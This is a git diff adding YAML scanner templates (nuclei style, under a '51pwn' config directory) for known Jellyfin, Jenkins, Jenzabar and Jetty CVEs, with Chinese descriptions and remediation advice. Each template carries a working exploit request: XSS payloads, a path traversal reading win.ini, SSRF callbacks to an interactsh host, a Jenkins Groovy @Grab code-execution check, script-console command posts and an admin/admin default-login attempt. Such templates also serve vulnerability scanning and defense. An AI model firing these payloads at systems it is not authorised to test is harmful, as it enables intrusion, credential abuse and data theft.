1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22' + method: GET diff --git a/config/51pwn/yaml/Jellyfin/CVE-2021-21402.yaml b/config/51pwn/yaml/Jellyfin/CVE-2021-21402.yaml new file mode 100755 index 000000000..1de38bda9 --- /dev/null +++ b/config/51pwn/yaml/Jellyfin/CVE-2021-21402.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-21402 +info: + name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read + author: + - l0ne1y + tags: + - cve + - cve2021 + - jellyfin + - lfi + description: |- + Jellyfin before version 10.7.1 路径遍历漏洞 + Jellyfin是一个免费软件媒体系统。可让您控制媒体的管理和流式传输。它是专有Emby和Plex的替代产品,可以通过多个应用程序将专用服务器中的媒体提供给最终用户设备。 + + Jellyfin before version 10.7.1存在安全漏洞,该漏洞源于精心制作的请求将允许从Jellyfin服务器的文件系统读取任意文件。 + reference: + - https://securitylab.github.com/advisories/ghsl-2021-050-jellyfin/ + - /~https://github.com/jellyfin/jellyfin/security/advisories/ghsa-wg4c-c9g9-rxhx + - /~https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 + - /~https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 + severity: medium + metadata: + fofa-query: title="Jellyfin" || body="http://jellyfin.media" + shodan-query: http.html:"Jellyfin" + verified: true + classification: + cve-id: + - cve-2021-21402 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + remediation: "官方修复方案:\n1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:/~https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'Content-Type: application/octet-stream' + - type: regex + part: body + regex: + - \[(font|extension|file)s\] + matchers-condition: and + path: + - '{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/' + - '{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/' + method: GET diff --git a/config/51pwn/yaml/Jellyfin/CVE-2021-29490.yaml b/config/51pwn/yaml/Jellyfin/CVE-2021-29490.yaml new file mode 100755 index 000000000..169da06da --- /dev/null +++ b/config/51pwn/yaml/Jellyfin/CVE-2021-29490.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-29490 +info: + name: Jellyfin 10.7.2 SSRF + author: + - l0ne1y + description: |- + Jellyfin 服务端请求伪造(SSRF)漏洞 + Jellyfin是一个免费软件媒体系统。可让您控制媒体的管理和流式传输。它是专有Emby和Plex的替代产品,可以通过多个应用程序将专用服务器中的媒体提供给最终用户设备。 + + Jellyfin 10.7.3之前的版本存在代码问题漏洞,该漏洞可能会暴露内部和外部的HTTP服务器,或者其他通过HTTP GET 从Jellyfin服务器看到的资源。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:/~https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + + 临时修复方案: + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}' + - '{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB' + method: GET diff --git a/config/51pwn/yaml/Jenkins/CVE-2018-1000600.yaml b/config/51pwn/yaml/Jenkins/CVE-2018-1000600.yaml new file mode 100755 index 000000000..f20260ecc --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2018-1000600.yaml @@ -0,0 +1,45 @@ +id: CVE-2018-1000600 +info: + name: Pre-auth Fully-responded SSRF + author: + - geeknik + tags: + - cve + - cve2018 + - jenkins + - ssrf + - oast + description: |- + Jenkins GitHub Plugin SSRF泄漏凭证 漏洞 + CloudBees Jenkins是美国CloudBees公司的一套基于Java开发的持续集成工具,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。GitHub Plugin是使用在其中的一个用于创建GitHub和Jenkins的连接的插件。 + reference: + - https://www.jenkins.io/security/advisory/2018-06-25/#security-915 + - https://devco.re/blog/2019/01/16/hacking-jenkins-part1-play-with-dynamic-routing/ + - https://jenkins.io/security/advisory/2018-06-25/#security-915 + severity: high + classification: + cve-id: + - cve-2018-1000600 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915 + + 临时修复方案: + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + path: + - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}' + method: GET diff --git a/config/51pwn/yaml/Jenkins/CVE-2018-1000861.yaml b/config/51pwn/yaml/Jenkins/CVE-2018-1000861.yaml new file mode 100755 index 000000000..82889ca6b --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2018-1000861.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-1000861 +info: + name: Jenkins - Remote Command Injection + author: + - l0ne1y + tags: + - cve + - cve2018 + - jenkin + - rce + - jenkins + description: |- + Jenkins <= 2.153/LTS 2.138.3 Stapler Web Framework MetaClass.java URL 代码执行漏洞 + CloudBees Jenkins(前称Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS(Long-Term Support)是CloudBees Jenkins的一个长期支持版本。 + + CloudBees Jenkins 2.153及之前版本和LTS 2.138.3及之前版本中的stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java文件的StaplerWeb框架存在代码执行漏洞。攻击者可借助特制的URLs利用该漏洞执行代码。 + reference: + - /~https://github.com/vulhub/vulhub/tree/master/jenkins/cve-2018-1000861 + - https://nvd.nist.gov/vuln/detail/cve-2018-1000861 + - https://jenkins.io/security/advisory/2018-12-05/#security-595 + - http://www.securityfocus.com/bid/106176 + severity: critical + classification: + cve-id: + - cve-2018-1000861 + cwe-id: + - cwe-502 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jenkins.io/security/advisory/2018-12-05/#SECURITY-1193 +requests: +- matchers: + - type: word + part: body + words: + - package#vulntest + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;' + method: GET diff --git a/config/51pwn/yaml/Jenkins/CVE-2019-10405.yaml b/config/51pwn/yaml/Jenkins/CVE-2019-10405.yaml new file mode 100755 index 000000000..2b3a15524 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2019-10405.yaml @@ -0,0 +1,65 @@ +id: CVE-2019-10405 +info: + name: Diagnostic page exposed Cookie HTTP header + author: + - l0ne1y + tags: + - cve + - cve2019 + - jenkins + description: |+ + CloudBees Jenkins和LTS 信息泄露漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS是CloudBeesJenkins的一个长期支持版本。 + + CloudBees Jenkins 2.196及之前版本和LTS 2.176.3及之前版本中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。 + + reference: + - https://nvd.nist.gov/vuln/detail/cve-2019-10405 + - https://jenkins.io/security/advisory/2019-09-25/#security-1505 + - http://www.openwall.com/lists/oss-security/2019/09/25/3 + severity: medium + metadata: + shodan-query: http.favicon.hash:81586312 + classification: + cve-id: + - cve-2019-10405 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1548 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: header + words: + - text/html + - x-jenkins + case-insensitive: true + - type: word + condition: and + part: body_2 + words: + - Cookie + - JSESSIONID + extractors: + - type: kval + kval: + - x_jenkins + matchers-condition: and + raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + req-condition: true diff --git a/config/51pwn/yaml/Jenkins/CVE-2019-10475.yaml b/config/51pwn/yaml/Jenkins/CVE-2019-10475.yaml new file mode 100755 index 000000000..f15669653 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2019-10475.yaml @@ -0,0 +1,52 @@ +id: CVE-2019-10475 +info: + name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting + author: + - l0ne1y + tags: + - cve + - cve2019 + - jenkins + - xss + - plugin + description: |+ + CloudBees Jenkins build-metrics Plugin 跨站脚本漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。build-metrics Plugin是使用在其中的一个构建指标生成插件。 + + CloudBees Jenkins build-metrics Plugin中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + + reference: + - https://jenkins.io/security/advisory/2019-10-23/#security-1490 + - http://www.openwall.com/lists/oss-security/2019/10/23/2 + - http://packetstormsecurity.com/files/155200/jenkins-build-metrics-1.3-cross-site-scripting.html + severity: medium + classification: + cve-id: + - cve-2019-10475 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://jenkins.io + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search' + method: GET diff --git a/config/51pwn/yaml/Jenkins/CVE-2020-2096.yaml b/config/51pwn/yaml/Jenkins/CVE-2020-2096.yaml new file mode 100755 index 000000000..6d5586867 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2020-2096.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-2096 +info: + name: Jenkins Gitlab Hook XSS + author: + - l0ne1y + tags: + - cve + - cve2020 + - jenkins + - xss + - gitlab + - plugin + description: |- + CloudBees Jenkins Gitlab Hook Plugin 跨站脚本漏洞 + Cloudbees Jenkins(Hudson Labs)是美国CloudBees(Cloudbees)公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。 + + CloudBees Jenkins Gitlab Hook Plugin 1.4.2及之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://jenkins.io/security/advisory/2020-01-15/#security-1683 + - http://www.openwall.com/lists/oss-security/2020/01/15/1 + - http://packetstormsecurity.com/files/155967/jenkins-gitlab-hook-1.4.2-cross-site-scripting.html + severity: medium + metadata: + shodan-query: http.title:"GitLab" + classification: + cve-id: + - cve-2020-2096 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683 + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Jenkins/CVE-2020-2103.yaml b/config/51pwn/yaml/Jenkins/CVE-2020-2103.yaml new file mode 100755 index 000000000..7e271ae32 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2020-2103.yaml @@ -0,0 +1,65 @@ +id: CVE-2020-2103 +info: + name: Diagnostic page exposed session cookies + author: + - l0ne1y + tags: + - cve + - cve2020 + - jenkins + description: |- + CloudBees Jenkins whoami诊断页面存在信息泄露漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS是CloudBeesJenkins的一个长期支持版本。 + + CloudBees Jenkins 2.218及之前和LTS 2.204.1及之前版本中的whoAmI诊断页面存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-2103 + - https://www.jenkins.io/security/advisory/2020-01-29/#security-1695 + - https://jenkins.io/security/advisory/2020-01-29/#security-1695 + - http://www.openwall.com/lists/oss-security/2020/01/29/1 + severity: medium + metadata: + shodan-query: http.favicon.hash:81586312 + classification: + cve-id: + - cve-2020-2103 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jenkins.io/security/advisory/2020-01-29/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: header + words: + - text/html + - x-jenkins + case-insensitive: true + - type: word + condition: and + part: body_2 + words: + - Cookie + - 'SessionId: null' + extractors: + - type: kval + kval: + - x_jenkins + matchers-condition: and + raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + req-condition: true diff --git a/config/51pwn/yaml/Jenkins/CVE-2020-2140.yaml b/config/51pwn/yaml/Jenkins/CVE-2020-2140.yaml new file mode 100755 index 000000000..655705338 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/CVE-2020-2140.yaml @@ -0,0 +1,52 @@ +id: CVE-2020-2140 +info: + name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting + author: + - l0ne1y + tags: + - cve + - cve2020 + - jenkins + - xss + - plugin + description: |+ + CloudBees Jenkins Audit Trail Plugin 跨站脚本漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。 + + CloudBees Jenkins中的Audit Trail Plugin 3.2及之前版本存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + + reference: + - https://www.jenkins.io/security/advisory/2020-03-09/ + - https://nvd.nist.gov/vuln/detail/cve-2020-2140 + - https://jenkins.io/security/advisory/2020-03-09/#security-1722 + - http://www.openwall.com/lists/oss-security/2020/03/09/1 + severity: medium + classification: + cve-id: + - cve-2020-2140 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1635 +requests: +- matchers: + - type: word + part: body + words: + -

sample + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample' + - '{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample' + method: GET diff --git a/config/51pwn/yaml/Jenkins/jenkins-unauthorized-access.yaml b/config/51pwn/yaml/Jenkins/jenkins-unauthorized-access.yaml new file mode 100755 index 000000000..4fcf238fd --- /dev/null +++ b/config/51pwn/yaml/Jenkins/jenkins-unauthorized-access.yaml @@ -0,0 +1,28 @@ +id: jenkins-unauthorized-access +info: + name: jenkins 未授权访问-任意命令执行 + author: + - l0ne1y + description: |- + Jenkins未授权访问导致任意命令执行漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。攻击者可未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 + severity: critical + remediation: |- + 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,verify) && status_code==200 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/script' + method: POST + body: script=printf%28%27{{verify}}%27%29%3B&Jenkins-Crumb={{verify}}&Submit=%E8%BF%90%E8%A1%8C +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/Jenkins/jenkins-weak-password.yaml b/config/51pwn/yaml/Jenkins/jenkins-weak-password.yaml new file mode 100755 index 000000000..84d3b8f67 --- /dev/null +++ b/config/51pwn/yaml/Jenkins/jenkins-weak-password.yaml @@ -0,0 +1,45 @@ +id: jenkins-weak-password +info: + name: Jenkins Default Login + author: + - l0ne1y + tags: + - jenkins + - default-login + description: |- + Jenkins 默认口令登录漏洞 + CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。其管理后台存在默认账户admin/admin,攻击者可通过默认账户登录后台实施高危操作。 + severity: high + classification: + cwe-id: + - cwe-522 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_3, "/logout") + - contains(body_3, "Dashboard [Jenkins]") + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + - | + POST /j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username=admin&j_password=admin&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + req-condition: true diff --git a/config/51pwn/yaml/Jenzabar/CVE-2021-26723.yaml b/config/51pwn/yaml/Jenzabar/CVE-2021-26723.yaml new file mode 100755 index 000000000..be1ccbb7c --- /dev/null +++ b/config/51pwn/yaml/Jenzabar/CVE-2021-26723.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-26723 +info: + name: Jenzabar v9.20-v9.2.2 XSS + author: + - pikpikcu + tags: + - cve + - cve2021 + - jenzabar + - xss + description: |- + Jenzabar 跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + ``` + reference: + - http://packetstormsecurity.com/files/161303/jenzabar-9.2.2-cross-site-scripting.html + - https://gist.github.com/y0ung-dst/d1b6b65be6248b0ffc2b2f2120deb205 + - https://jenzabar.com/blog + - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 + severity: medium + classification: + cve-id: + - cve-2021-26723 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://jenzabar.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' + ``` +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '>' + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + method: GET diff --git a/config/51pwn/yaml/Jetty/CVE-2015-2080.yaml b/config/51pwn/yaml/Jetty/CVE-2015-2080.yaml new file mode 100755 index 000000000..c21b8a73b --- /dev/null +++ b/config/51pwn/yaml/Jetty/CVE-2015-2080.yaml @@ -0,0 +1,46 @@ +id: CVE-2015-2080 +info: + name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage + author: + - l0ne1y + tags: + - cve + - cve2015 + - jetty + description: |- + Jetty before 9.2.9.v20150224信息泄露漏洞 + Eclipse Jetty是Eclipse基金会的一个开源的、基于Java的Web服务器和Java Servlet容器。 + + Eclipse Jetty 9.2.9.v20150224之前版本中的异常处理代码功能存在安全漏洞。远程攻击者可借助HTTP头中的非法字符利用该漏洞获取进程内存的敏感信息。 + reference: + - /~https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md + - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html + - http://packetstormsecurity.com/files/130567/jetty-9.2.8-shared-buffer-leakage.html + - https://nvd.nist.gov/vuln/detail/cve-2015-2080 + severity: high + classification: + cve-id: + - cve-2015-2080 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: |- + 官方修复方案: + 